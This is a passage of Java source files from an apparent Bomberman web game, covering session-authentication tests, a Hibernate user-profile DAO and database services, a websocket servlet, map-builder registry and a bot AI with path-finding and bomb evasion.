            assertEquals(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
        else
            assertEquals(false, response.getCookies().containsKey(UserTokenManager.COOKIE_NAME));
    }
    /** Drives Sessions.isAuthenticated with prepared (headers, expected) data. */
    public void testIsAuthenticated(Pair<HttpHeaders, Response> data) {
        final Response response = sessions.isAuthenticated(data.getValue0());
        assertEquals(data.getValue1().toString(), response.toString());
        assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
    }
    /**
     * Drives Sessions.logoutUser; also asserts the response cookie no longer
     * carries the live session id.
     */
    public void testLogout(Pair<HttpHeaders, Response> data) {
        final Response response = sessions.logoutUser(data.getValue0());
        assertEquals(data.getValue1().toString(), response.toString());
        assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
        assertNotSame(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
    }
    // Shared mocked AccountService registered once for the whole suite.
    @BeforeClass
    public static void makeContext() throws InstantiationException {
        final AccountService mockedAccountService = Constants.RestApplicationMocks.getMockedAccountService();
        CONTEXT.put(AccountService.class, mockedAccountService);
    }
    /** JerseyTest hook: registers the resource plus mocked request/context bindings. */
    @Override
    protected Application configure() {
        //noinspection OverlyBroadCatchBlock
        try {
            final ResourceConfig config = new ResourceConfig(Sessions.class);
            final HttpServletRequest request = mock(HttpServletRequest.class);
            //noinspection AnonymousInnerClassMayBeStatic
            config.register(new AbstractBinder() {
                @Override
                protected void configure() {
                    bind(CONTEXT);
                    bind(request).to(HttpServletRequest.class);
                }
            });
            return config;
        } catch (Exception ex) {
            ex.printStackTrace();
            fail();
        }
        return null;
    }
    /**
     * Builds (request, headers, expected-response) fixtures for each scenario.
     */
    private static class RequestFactory {
        public static Triplet<String, HttpHeaders, Response> getLoginTestData(LoginRequestType type) {
            switch (type)
            {
                case LOGIN_OK:
                    return Triplet.with(okLoginJSON(), NO_COOKIE_HEADERS, okLoginResponse());
                case LOGIN_WRONG_LOGIN:
                    return Triplet.with(wrongLoginLoginJSON(), NO_COOKIE_HEADERS, wrongLoginLoginResponse());
                case LOGIN_WRONG_PASSWORD:
                    return Triplet.with(wrongPasswordLoginJSON(), NO_COOKIE_HEADERS, wrongPasswordLoginResponse());
            }
            throw new IllegalArgumentException();
        }
        public static Pair<HttpHeaders, Response> getIsAuthenticatedTestData(IsAuthRequestType type) {
            switch (type) {
                case IS_AUTH_OK:
                    return Pair.with(OK_COOKIE_HEADERS, okIsAuthResponse());
                case IS_AUTH_NO_COOKIE:
                    return Pair.with(NO_COOKIE_HEADERS, wrongIsAuthResponse());
                case IS_AUTH_WRONG_COOKIE:
                    return Pair.with(WRONG_COOKIE_HEADERS, wrongIsAuthResponse());
            }
            throw new IllegalArgumentException();
        }
        public static Pair<HttpHeaders, Response> getLogoutTestData(LogoutRequestType type) {
            switch (type) {
                case LOGOUT_LOGGED:
                    return Pair.with(OK_COOKIE_HEADERS, okLogoutResponse());
                case LOGOUT_NOT_LOGGED:
                    return Pair.with(NO_COOKIE_HEADERS, wrongLogoutResponse());
                case LOGOUT_WRONG_COOKIE:
                    return Pair.with(WRONG_COOKIE_HEADERS, wrongLogoutResponse());
            }
            throw new IllegalArgumentException();
        }
        private static String okLoginJSON() {
            return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
        }
        private static Response okLoginResponse() {
            return Response.ok(new JSONObject().put("id", ID).toString()).build();
        }
        private static String wrongLoginLoginJSON() {
            return new JSONObject().put("login", "").put("password", <PASSWORD>).toString();
        }
        private static Response wrongLoginLoginResponse() {
            return WebErrorManager.authorizationRequired("Wrong login!");
        }
        private static String wrongPasswordLoginJSON() {
            return new JSONObject().put("login", LOGIN).put("password", "").toString();
        }
        private static Response wrongPasswordLoginResponse() {
            return WebErrorManager.authorizationRequired("Wrong login-password pair!");
        }
        private static Response okIsAuthResponse() {
            return Response.ok(new JSONObject().put("id", ID).toString()).build();
        }
        private static Response wrongIsAuthResponse() {
            return WebErrorManager.authorizationRequired();
        }
        private static Response okLogoutResponse() {
            return WebErrorManager.okRaw("You have succesfully logged out.").cookie(UserTokenManager.getNewNullCookie()).build();
        }
        private static Response wrongLogoutResponse() {
            return WebErrorManager.ok("You was not logged in.");
        }
        @SuppressWarnings("InnerClassTooDeeplyNested")
        public enum LoginRequestType {LOGIN_OK, LOGIN_WRONG_LOGIN, LOGIN_WRONG_PASSWORD}
        @SuppressWarnings("InnerClassTooDeeplyNested")
        public enum IsAuthRequestType {IS_AUTH_OK, IS_AUTH_WRONG_COOKIE, IS_AUTH_NO_COOKIE}
        @SuppressWarnings("InnerClassTooDeeplyNested")
        public enum LogoutRequestType {LOGOUT_LOGGED, LOGOUT_NOT_LOGGED, LOGOUT_WRONG_COOKIE}
    }
    private static final Context CONTEXT = new Context();
    private final Sessions sessions = new Sessions();
    private static final HttpHeaders NO_COOKIE_HEADERS = Constants.RestApplicationMocks.getNoCookieHeaders();
    private static final HttpHeaders OK_COOKIE_HEADERS = Constants.RestApplicationMocks.getOkCookieHeaders();
    private static final HttpHeaders WRONG_COOKIE_HEADERS = Constants.RestApplicationMocks.getWrongCookieHeaders();
    @SuppressWarnings("ConstantNamingConvention")
    private static final long ID = Constants.USER_ID;
    private static final String LOGIN = Constants.USER_LOGIN;
    private static final String PASSWORD = <PASSWORD>;
    private static final String SID = Constants.USER_SESSION_ID;
}
<file_sep>/src/main/java/main/databaseservice/UserProfileDataDAO.java
package main.databaseservice;
import org.hibernate.Criteria;
import org.hibernate.Session;
import org.hibernate.Transaction;
import org.hibernate.criterion.Order;
import org.hibernate.criterion.Restrictions;
import java.util.List;
/**
 * Thin Hibernate DAO for UserProfileData rows. All operations run on the
 * single Session supplied at construction. Only delete() manages its own
 * transaction (the original contract of this class); the other methods rely
 * on the caller to provide transaction boundaries.
 */
public class UserProfileDataDAO {
    public UserProfileDataDAO(Session session) {
        this.session = session;
    }

    /** Inserts or updates the given row (Hibernate saveOrUpdate semantics). */
    public void save(UserProfileData dataSet) {
        session.saveOrUpdate(dataSet);
    }

    /** @return the row with this primary key, or null when absent. */
    public UserProfileData read(long id) {
        return session.get(UserProfileData.class, id);
    }

    /** @return the unique row with this login, or null when absent. */
    public UserProfileData readByName(String name) {
        final Criteria criteria = session.createCriteria(UserProfileData.class);
        return (UserProfileData) criteria.add(Restrictions.eq("login", name)).uniqueResult();
    }

    @SuppressWarnings("unchecked")
    public List<UserProfileData> readAll() {
        final Criteria criteria = session.createCriteria(UserProfileData.class);
        return (List<UserProfileData>) criteria.list();
    }

    /** @return up to ten rows with the highest score, best first. */
    @SuppressWarnings("unchecked")
    public List<UserProfileData> readTop10() {
        final Criteria criteria = session.createCriteria(UserProfileData.class);
        return (List<UserProfileData>) criteria.addOrder(Order.desc("score")).setMaxResults(10).list();
    }

    /** Deletes the row with this id inside its own transaction. */
    public void delete(long id) {
        final UserProfileData dataSet = new UserProfileData();
        dataSet.setId(id);
        final Transaction transaction = session.beginTransaction();
        try {
            session.delete(dataSet);
            transaction.commit();
        } catch (RuntimeException ex) {
            // BUGFIX: previously a failed delete left the transaction open,
            // poisoning the shared Session for every subsequent caller.
            transaction.rollback();
            throw ex;
        }
    }

    private final Session session;
}
<file_sep>/src/test/java/main/databaseService/DataBaseServiceHashMapImplTest.java
package main.databaseservice;
import constants.Constants;
import org.junit.Before;
import org.junit.Test;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
/**
 * Unit tests for the in-memory (HashMap-backed) DataBaseService implementation.
 * A fresh service is created before each test, so tests are independent.
 */
public class DataBaseServiceHashMapImplTest {
    @Before
    public void init() throws Exception {
        dataBaseService = new DataBaseServiceHashMapImpl();
    }

    /** Adding a user succeeds once; a duplicate login yields null. */
    @Test
    public void testAddUser() throws Exception {
        UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        assertEquals(dataBaseService.getById(user.getId()), dataBaseService.getByLogin(user.getLogin()));
        user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNull(user);
    }

    /** A deleted user is reachable neither by id nor by login. */
    @Test
    public void testDeleteUser() throws Exception {
        final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        final String login = user.getLogin();
        final long id = user.getId();
        dataBaseService.deleteUser(id);
        assertNull(dataBaseService.getById(id));
        assertNull(dataBaseService.getByLogin(login));
    }

    /** getUsers returns every stored profile. */
    @Test
    public void testGetUsers() throws Exception {
        final UserProfile user1 = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        final UserProfile user2 = dataBaseService.addUser("user1", "user1");
        assertNotNull(user1);
        assertNotNull(user2);
        final Map<Long, UserProfile> map = new HashMap<>();
        map.put(user1.getId(), user1);
        map.put(user2.getId(), user2);
        final Collection<UserProfile> userData = dataBaseService.getUsers();
        assertNotNull(userData);
        assertEquals(map.values().toString(), userData.toString());
    }

    @Test
    public void testContainsID() throws Exception {
        final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        // assertTrue/assertFalse read better and fail with clearer messages
        // than assertEquals(true/false, ...); also drops the pointless local
        // reassignment the original used.
        assertTrue(dataBaseService.containsID(user.getId()));
        assertFalse(dataBaseService.containsID(-1L));
    }

    @Test
    public void testGetById() throws Exception {
        final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        final long id = user.getId();
        assertEquals(user, dataBaseService.getById(id));
    }

    @Test
    public void testGetByLogin() throws Exception {
        final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        assertEquals(user, dataBaseService.getByLogin(Constants.USER_LOGIN));
    }

    @Test
    public void testContainsLogin() throws Exception {
        final UserProfile user = dataBaseService.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
        assertNotNull(user);
        assertTrue(dataBaseService.containsLogin(Constants.USER_LOGIN));
        assertFalse(dataBaseService.containsLogin(""));
    }

    private DataBaseService dataBaseService;
}<file_sep>/src/main/java/main/websockets/WebSocketConnectionServlet.java
package main.websockets;
import main.config.Context;
import org.eclipse.jetty.websocket.servlet.WebSocketServlet;
import org.eclipse.jetty.websocket.servlet.WebSocketServletFactory;
import javax.servlet.annotation.WebServlet;
/**
 * Upgrades HTTP requests on /game to websocket connections, wiring every new
 * socket to the shared application context via WebSocketConnectionCreator.
 */
@WebServlet(name = "WebSocketConnectionServlet", urlPatterns = {"/game"})
public class WebSocketConnectionServlet extends WebSocketServlet {
    /**
     * @param context shared application context handed to every new socket
     * @param timeout idle timeout applied to the websocket policy
     *                (NOTE(review): unit presumably milliseconds — confirm
     *                against Jetty's WebSocketPolicy#setIdleTimeout)
     */
    public WebSocketConnectionServlet(Context context, int timeout) {
        this.context = context;
        this.idleTimeout = timeout;
    }

    /** Jetty hook: applies the idle timeout and installs the socket factory. */
    @Override
    public void configure(WebSocketServletFactory webSocketServletFactory) {
        webSocketServletFactory.getPolicy().setIdleTimeout(idleTimeout);
        webSocketServletFactory.setCreator(new WebSocketConnectionCreator(context));
    }

    private final int idleTimeout;
    private final Context context;
}
<file_sep>/src/main/java/bomberman/mechanics/WorldBuilderForeman.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.IWorldBuilder;
import bomberman.mechanics.worldbuilders.BasicWorldBuilder;
import bomberman.mechanics.worldbuilders.TextWorldBuilder;
import bomberman.mechanics.worldbuilders.TextWorldBuilderV11;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.util.*;
import java.util.stream.Collectors;
/**
 * Static registry of world builders, keyed by template name, plus a
 * round-robin dispenser of template names.
 */
public class WorldBuilderForeman {
    /**
     * @return the builder registered for worldType, or a fresh empty
     *         BasicWorldBuilder (with a warning) when the name is unknown.
     */
    public static IWorldBuilder getWorldBuilderInstance(String worldType) {
        if (BUILDERS.containsKey(worldType))
            return BUILDERS.get(worldType);
        LOGGER.warn("Cannot find \"" + worldType + "\" template! Returning empty basic world instead.");
        return new BasicWorldBuilder();
    }

    /**
     * Despite its name this cycles through all registered templates round-robin
     * rather than sampling at random (behavior kept as-is).
     * IMPROVED: the name list is computed once and sorted, so the rotation
     * order is deterministic instead of depending on HashMap iteration order,
     * and no temporary list is rebuilt on every call.
     * NOTE(review): still not thread-safe (unsynchronized counter) — unchanged
     * from the original.
     */
    public static String getRandomWorldName() {
        if (lastWorldNum >= WORLD_NAMES.size())
            lastWorldNum = 0;
        return WORLD_NAMES.get(lastWorldNum++);
    }

    /** Gathers builders of every supported map format into one registry. */
    private static Map<String, IWorldBuilder> collectBuilders() {
        final Map<String, IWorldBuilder> all = new HashMap<>();
        all.putAll(TextWorldBuilder.getAllTextBuilders());
        all.putAll(TextWorldBuilderV11.getAllTextBuilders());
        return all;
    }

    /** Snapshot of the registry's names in a stable (sorted) order. */
    private static List<String> collectNames() {
        final List<String> names = new ArrayList<>(BUILDERS.keySet());
        Collections.sort(names);
        return names;
    }

    private static final Map<String, IWorldBuilder> BUILDERS = collectBuilders();
    // Must be initialized after BUILDERS (static initializers run in order).
    private static final List<String> WORLD_NAMES = collectNames();
    private static final Logger LOGGER = LogManager.getLogger(WorldBuilderForeman.class);
    // Plain int instead of boxed Integer: avoids (un)boxing on every call.
    private static int lastWorldNum = 0;
}
<file_sep>/src/main/java/bomberman/mechanics/SimpleBotBehavior.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.Updateable;
import bomberman.service.TimeHelper;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import java.util.*;
public class SimpleBotBehavior implements Updateable {
/**
 * @param owner the bomberman this behavior steers
 * @param world the world the owner lives in (queried for tiles and enemies)
 */
SimpleBotBehavior(Bomberman owner, World world) {
    this.owner = owner;
    this.world = world;
}
/**
 * One AI tick: re-targets if necessary, then feeds the next queued movement
 * to the owner. Any exception is logged and swallowed deliberately so a buggy
 * bot cannot kill the world's update loop.
 */
@Override
public void update(long deltaT) {
    //noinspection OverlyBroadCatchBlock
    try {
        selectNextTargetIfNeeded();
        passMovementsToTarget();
    } catch (Exception ex) {
        LOGGER.error("Something happened in bot's " + owner + " behavior " + this, ex);
    }
}
/**
 * Re-evaluates the current target:
 * 1) target reached and bombable — drop a bomb and switch to fleeing from it;
 * 2) target invalid, or a non-bomb target reached — pick a new one.
 *
 * @return true only when a brand-new target was selected.
 */
private boolean selectNextTargetIfNeeded() {
    if (target.wasReached() && target.canLayBomb()) {
        world.tryPlacingBomb(owner.getID(), false);
        movementsToTarget.clear();
        pathFinder.makeEvasionFromBomb();
        return false;
    }
    if (target.isInvalid() || target.wasReached()) {
        movementsToTarget.clear();
        pathFinder.selectNewTarget();
        return true;
    }
    return false;
}
/**
 * Hands the head of the movement queue to the owner when its timestamp allows.
 * NOTE(review): the guard 'startTime >= now' forwards movements whose start
 * time has NOT yet passed, and an overdue head (startTime < now) is never
 * forwarded and permanently blocks the queue until it is cleared elsewhere.
 * Intuitively the comparison looks inverted ('now >= startTime') — confirm
 * against how storeMovements timestamps its entries.
 */
private void passMovementsToTarget() {
    final Triplet<Float, Float, Long> nextMovement = movementsToTarget.peek();
    if (nextMovement != null && nextMovement.getValue2() >= TimeHelper.now()) {
        owner.addMovement(nextMovement);
        movementsToTarget.remove();
    }
}
/**
 * The bot's current objective: a tile coordinate plus flags describing how to
 * act on arrival (drop a bomb there, or flee from one just planted).
 * (-1, -1) is the "nothing selected yet" sentinel.
 */
private class Target {
    public Target setX(int x) {
        this.x = x;
        return this;
    }
    public Target setY(int y) {
        this.y = y;
        return this;
    }
    /** Resets the target to the "nothing selected" sentinel. */
    public void invalidateTarget() {
        x = -1;
        y = -1;
    }
    public int getY() {
        return y;
    }
    public int getX() {
        return x;
    }
    public boolean shouldLayBomb() {
        return shouldLayBomb;
    }
    public Target makeLayBomb(@SuppressWarnings("ParameterHidesMemberVariable") boolean shouldLayBomb) {
        this.shouldLayBomb = shouldLayBomb;
        return this;
    }
    /**
     * True when the owner may and should bomb this target right now.
     * NOTE(review): comparing float coordinates with == against int tile
     * indices only matches when the owner stands exactly on the grid point —
     * confirm this is the intended trigger.
     */
    public boolean canLayBomb() {
        if (shouldLayBomb && owner.canSpawnBomb())
            if (owner.getCoordinates()[0] == x && owner.getCoordinates()[1] == y)
                if (distanceTo(x, y) < owner.getBombExplosionRange())
                    return true;
        return false;
    }
    public boolean isEvasionTarget() {
        return isEvasionTarget;
    }
    public void makeEvasionTarget(boolean evasionTarget) {
        isEvasionTarget = evasionTarget;
    }
    /**
     * True while no target has been chosen yet.
     * BUGFIX: the condition was inverted ((x != -1) && (y != -1)), which made
     * every *selected* target count as "first time" — and therefore invalid in
     * isInvalid() — forcing a re-selection on every tick.
     */
    public boolean isFirstTime() {
        return (x == -1) && (y == -1);
    }
    private boolean isInvalid() {
        if (isFirstTime() || wasReached())
            return true;
        if (isEvasionTarget)
            return false;
        boolean isInvalid = true;
        if (world.getTiles()[y][x] != null && world.getTiles()[y][x].isDestructible())
            // Target is a (still standing) destructible tile.
            isInvalid = false;
        else {
            boolean isOneOfThemIsValid = false;
            // Target is (presumably) an enemy bomberman: stay valid while some
            // enemy is in range and has not left the targeted row/column.
            for (Bomberman bomberman : world.getBombermen())
                if (!bomberman.equals(owner))
                    if (distanceTo(bomberman.getCoordinates()[0], bomberman.getCoordinates()[1]) < LOOK_FOR_ENEMY_RADIUS) {
                        final int enemyX = (int) Math.floor(bomberman.getCoordinates()[0]);
                        // BUGFIX: enemyY was computed from coordinates[0] (the X
                        // axis) — a copy-paste error.
                        final int enemyY = (int) Math.floor(bomberman.getCoordinates()[1]);
                        // NOTE(review): '||' keeps the target valid when only one
                        // axis still matches; '&&' may have been intended.
                        if (x == enemyX || y == enemyY)
                            isOneOfThemIsValid = true;
                    }
            if (isOneOfThemIsValid)
                isInvalid = false;
        }
        return isInvalid;
    }
    /** True once the owner is within roughly half a tile of the target point. */
    public boolean wasReached() {
        return distanceTo(x, y) < 0.45f;
    }
    /** Path-finder distance from the owner's position to (anotherX, anotherY). */
    public double distanceTo(double anotherX, double anotherY) {
        return pathFinder.distanceBetween(owner.getCoordinates()[0], owner.getCoordinates()[1], anotherX, anotherY);
    }
    /** Whether the tile is any of the pickup bonuses. */
    public boolean isBonus(ITile tile) {
        boolean result = false;
        if (tile != null)
            if (tile.getType() == EntityType.BONUS_DECBOMBSPAWN ||
                    tile.getType() == EntityType.BONUS_DROPBOMBONDEATH ||
                    tile.getType() == EntityType.BONUS_INCMAXHP ||
                    tile.getType() == EntityType.BONUS_INCMAXRANGE ||
                    tile.getType() == EntityType.BONUS_INCSPEED ||
                    tile.getType() == EntityType.BONUS_INVUL ||
                    tile.getType() == EntityType.BONUS_MOREBOMBS)
                result = true;
        return result;
    }
    /** Whether the tile is a bombable wall. */
    public boolean isDestructibleWall(ITile tile) {
        boolean result = false;
        if (tile != null)
            if (tile.getType() == EntityType.DESTRUCTIBLE_WALL)
                result = true;
        return result;
    }
    @SuppressWarnings("InstanceVariableNamingConvention")
    private int x = -1;
    @SuppressWarnings("InstanceVariableNamingConvention")
    private int y = -1;
    private boolean shouldLayBomb = false;
    private boolean isEvasionTarget = false;
}
// Current objective, shared between the behavior tick and the path finder.
private final Target target = new Target();
private class PathFinder {
/** Convenience wrapper: plots a route to the current target's tile. */
public void calculatePathToTarget() {
    calculatePathTo(target.getX(), target.getY());
}
/**
 * Plans an escape route out of the blast radius of a bomb just planted at the
 * owner's feet and queues the corresponding movements. The target is flagged
 * as an evasion target (exempt from normal invalidation) and must not trigger
 * another bomb on arrival.
 */
public void makeEvasionFromBomb() {
    // Truncating the owner's float coordinates yields the tile he stands on
    // (coordinates are non-negative inside the map).
    final int originX = (int) owner.getCoordinates()[0];
    final int originY = (int) owner.getCoordinates()[1];
    final List<Pair<Integer, Integer>> escapeRoute =
            calculateEvasionPath(originX, originY, 0, originX, originY, owner.getBombExplosionRange());
    target.makeEvasionTarget(true);
    target.makeLayBomb(false);
    storeMovements(escapeRoute);
}
/**
 * Converts a tile-to-tile route into timed movement triplets
 * (dx, dy, startTime) appended to movementsToTarget; each step's start time
 * is offset by the completion time of the previous leg.
 * NOTE(review): the delta is computed as previous - next, i.e. it points from
 * the next waypoint back toward the current tile — confirm the sign convention
 * expected by Bomberman.addMovement. The (float) cast binds to prevTileX only,
 * which already forces float arithmetic for the whole subtraction.
 */
private void storeMovements(List<Pair<Integer, Integer>> movementsList) {
    long movementStartTime = TimeHelper.now();
    int prevTileX = (int) owner.getCoordinates()[0];
    int prevTileY = (int) owner.getCoordinates()[1];
    for (Pair<Integer, Integer> movement : movementsList) {
        movementsToTarget.add(new Triplet<>((float) prevTileX - movement.getValue0(), (float) prevTileY - movement.getValue1(), movementStartTime));
        movementStartTime += getMovementCompletitonTime(distanceBetween(prevTileX, prevTileY, movement.getValue0(), movement.getValue1()));
        prevTileX = movement.getValue0();
        prevTileY = movement.getValue1();
    }
}
/**
 * Straight-line (Euclidean) distance between two points.
 * The Math.abs calls of the original were redundant — squaring already
 * discards the sign, bit-for-bit identically in IEEE arithmetic.
 */
public double distanceBetween(double otherX, double otherY, double anotherX, double anotherY) {
    final double dx = otherX - anotherX;
    final double dy = otherY - anotherY;
    return Math.sqrt(dx * dx + dy * dy);
}
/**
 * Picks a new objective, in strict priority order:
 * 1) an enemy close enough to attack right now (bomb on arrival);
 * 2) a bonus worth grabbing (no bomb);
 * 3) a destructible wall worth bombing;
 * 4) any enemy at all.
 * If nothing matches, the previous target's coordinates are left untouched
 * (only its evasion flag is cleared).
 */
public void selectNewTarget() {
    target.makeEvasionTarget(false);
    if (markBombermanAsATarget(KILL_ENEMY_NOW_RADIUS))
        target.makeLayBomb(true);
    else if (seekForASpecificTile(GATHER_BONUS_RADIUS, target::isBonus))
        target.makeLayBomb(false);
    else if (seekForASpecificTile(BREAK_WALL_RADIUS, target::isDestructibleWall))
        target.makeLayBomb(true);
    else if (markBombermanAsATarget(KILL_ENEMY_ANYWAY))
        target.makeLayBomb(true);
}
private boolean markBombermanAsATarget(int notFartherThan) {
Bomberman enemy = null;
for (Bomberman bomberman : world.getBombermen())
if (bomberman.getID() != owner.getID())
if (target.distanceTo(bomberman.getCoordinates()[0], bomberman.getCoordinates()[1]) < notFartherThan) {
enemy = bomberman;
break;
}
if (enemy != null) {
target.setX((int) enemy.getCoordinates()[0]);
target.setY((int) enemy.getCoordinates()[1]);
return true;
}
return false;
}
private boolean seekForASpecificTile(int notFartherThan, SpecificTileCondition cond) {
final List<Pair<Integer, Integer>> movementsToASpecificTile = movementsToASpecificTile((int) owner.getCoordinates()[0], (int) owner.getCoordinates()[1], 0, notFartherThan, cond);
if (!movementsToASpecificTile.isEmpty()) {
storeMovements(movementsToASpecificTile);
return true;
} else
return false;
}
private List<Pair<Integer, Integer>> movementsToASpecificTile(int x, int y, int iterationDepth, int notFartherThan, SpecificTileCondition cond) {
List<Pair<Integer, Integer>> movementsToReachSafeTile = new LinkedList<>();
final ArrayList<List<Pair<Integer, Integer>>> sortArray = new ArrayList<>(4);
for (int dx = -1; dx < 2; dx += 2)
for (int dy = -1; dy < 2; dy += 2) {
final ITile tile = world.getTiles()[y + dy][x + dx];
if (cond.isThisKindOfITile(tile)) {
final LinkedList<Pair<Integer, Integer>> safeMovement = new LinkedList<>();
safeMovement.add(new Pair<>(x + dx, y + dy));
return safeMovement;
} else if (iterationDepth <= notFartherThan && isTileSafe(x + dx, y + dy)) {
final List<Pair<Integer, Integer>> nextMovements = movementsToASpecificTile(x + dx, y + dy, iterationDepth + 1, notFartherThan, cond);
if (!nextMovements.isEmpty()) {
nextMovements.add(0, new Pair<>(x + dx, y + dy));
sortArray.add(nextMovements);
}
}
}
boolean movementsToTargetNotTouched = true;
if (!sortArray.isEmpty())
for (List<Pair<Integer, Integer>> movementList : sortArray)
if (movementsToTargetNotTouched || movementList.size() < movementsToReachSafeTile.size()) {
movementsToTargetNotTouched = false;
movementsToReachSafeTile = movementList;
}
return movementsToReachSafeTile;
}
// TODO: Move bombY, bombX, bombRadius into a separate lambda and unite this method with previous one.
private List<Pair<Integer, Integer>> calculateEvasionPath(int x, int y, int iterationDepth, int bombX, int bombY, int bombRadius) {
List<Pair<Integer, Integer>> movementsToReachSafeTile = new LinkedList<>();
final ArrayList<List<Pair<Integer, Integer>>> sortArray = new ArrayList<>(4);
for (int dx = -1; dx < 2; dx += 2)
for (int dy = -1; dy < 2; dy += 2)
if (isTileSafeFromExplosion(x + dx, y + dy, bombX, bombY, bombRadius)) {
final LinkedList<Pair<Integer, Integer>> safeMovement = new LinkedList<>();
safeMovement.add(new Pair<>(x + dx, y + dy));
return safeMovement;
} else
if (iterationDepth <= getMaximalRecursionDepth()) {
final List<Pair<Integer, Integer>> nextMovements = calculateEvasionPath(x + dx, y + dy, iterationDepth + 1, bombX, bombY, bombRadius);
if (!nextMovements.isEmpty()) {
nextMovements.add(0, new Pair<>(x + dx, y + dy));
sortArray.add(nextMovements);
}
}
boolean movementsToTargetNotTouched = true;
if (!sortArray.isEmpty())
for (List<Pair<Integer, Integer>> movementList : sortArray)
if (movementsToTargetNotTouched || movementList.size() < movementsToReachSafeTile.size()) {
movementsToTargetNotTouched = false;
movementsToReachSafeTile = movementList;
}
return movementsToReachSafeTile;
}
private void calculatePathTo(double x, double y) {
}
private void calculatePathTo(int x, int y) {
calculatePathTo(Math.floor(x) + 0.5, Math.floor(y) + 0.5);
}
private long getMovementCompletitonTime(double distance) {
return (long) Math.floor(distance / owner.getMaximalSpeed());
}
private boolean isTileSafeFromExplosion(int tileX, int tileY, int bombX, int bombY, int bombRadius) {
if (isTileSafe(tileX, tileY)) {
if (tileX != bombX || tileY != bombY)
return true;
if (distanceBetween(tileX, tileY, bombX, bombY) > bombRadius)
return true;
}
//Lazy to check any obstacles
return false;
}
private boolean isTileSafe(int tileX, int tileY) {
if (tileX < 0 || tileX > world.getWidth())
return false;
if (tileY < 0 || tileY > world.getHeight())
return false;
final ITile tile = world.getTiles()[tileY][tileX];
return tile == null || tile.isPassable() && tile.getType() != EntityType.BOMB_RAY;
}
private int getMaximalRecursionDepth() {
return owner.getBombExplosionRange();
}
public static final int KILL_ENEMY_NOW_RADIUS = 4; // any enemy bomberman within 5 tile radius will be a target.
public static final int GATHER_BONUS_RADIUS = 8; // any bonus within 8 tile radius will be a target.
public static final int BREAK_WALL_RADIUS = 12; // covers ~2/3 of the map. Any breakable wall will be attemted to be removed
public static final int KILL_ENEMY_ANYWAY = 256; // if the map is scorched and nothing else can be broken, scout and destroy enemies!
}
private final PathFinder pathFinder = new PathFinder();
interface SpecificTileCondition {
boolean isThisKindOfITile(ITile tile);
}
private final Bomberman owner;
private final World world;
private final Queue<Triplet<Float, Float, Long>> movementsToTarget = new LinkedList<>();
private static final float LOOK_FOR_ENEMY_RADIUS = 5.0f; // 10 tiles in diameter
private static final Logger LOGGER = LogManager.getLogger(SimpleBotBehavior.class);
}
<file_sep>/src/main/java/main/databaseservice/DataBaseServiceMySQLImpl.java
package main.databaseservice;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.hibernate.*;
import org.jetbrains.annotations.Nullable;
import rest.UserProfile;
import java.sql.*;
import java.util.*;
import org.hibernate.boot.registry.StandardServiceRegistryBuilder;
import org.hibernate.cfg.Configuration;
import org.hibernate.service.ServiceRegistry;
public class DataBaseServiceMySQLImpl implements DataBaseService, AutoCloseable {
public DataBaseServiceMySQLImpl(Map<String, String> parameters) throws Exception {
config = new Config(parameters, DBTYPE.PRODUCTION);
createDBAndSetup();
}
public DataBaseServiceMySQLImpl(Map<String, String> parameters, DBTYPE dbtype) throws Exception {
config = new Config(parameters, dbtype);
createDBAndSetup();
}
public void createDBAndSetup() throws Exception {
try {
setup();
} catch (HibernateException ex) {
//noinspection OverlyBroadCatchBlock
try {
LOGGER.warn("Could not connect to DB. Attempting to create it.");
connectToDBOrDie();
setup();
} catch (Exception ex2) {
LOGGER.fatal("Check if MySQL is running and is compatible with 5.1.38 mysql/j.", ex2);
throw ex2;
}
}
}
@Override
public void save(UserProfileData dataSet) {
try (Session session = sessionFactory.openSession()) {
final Transaction transaction = session.beginTransaction();
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
dao.save(dataSet);
transaction.commit();
}
}
@Override
@Nullable
public UserProfile getById(long id) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final UserProfileData data = dao.read(id);
if (data == null)
return null;
else
return new UserProfile(dao.read(id));
} catch (HibernateException ex) {
final String reason = "Could not get user #" + id + " by ID!";
LOGGER.info(reason, ex);
return null;
}
}
@Override
@Nullable
public UserProfile getByLogin(String name) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final UserProfileData data = dao.readByName(name);
if (data == null)
return null;
else
return new UserProfile(dao.readByName(name));
} catch (HibernateException ex) {
final String reason = "Could not get user \"" + name + "\" by login!";
LOGGER.info(reason, ex);
return null;
}
}
@Override
@Nullable
public Collection<UserProfile> getUsers() {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final LinkedList<UserProfile> result = new LinkedList<>();
dao.readAll().stream().forEach((data) -> result.add(new UserProfile(data)));
return result;
} catch (HibernateException ex) {
final String reason = "Could not get all users somewhy! O_o";
LOGGER.error(reason, ex);
return null;
}
}
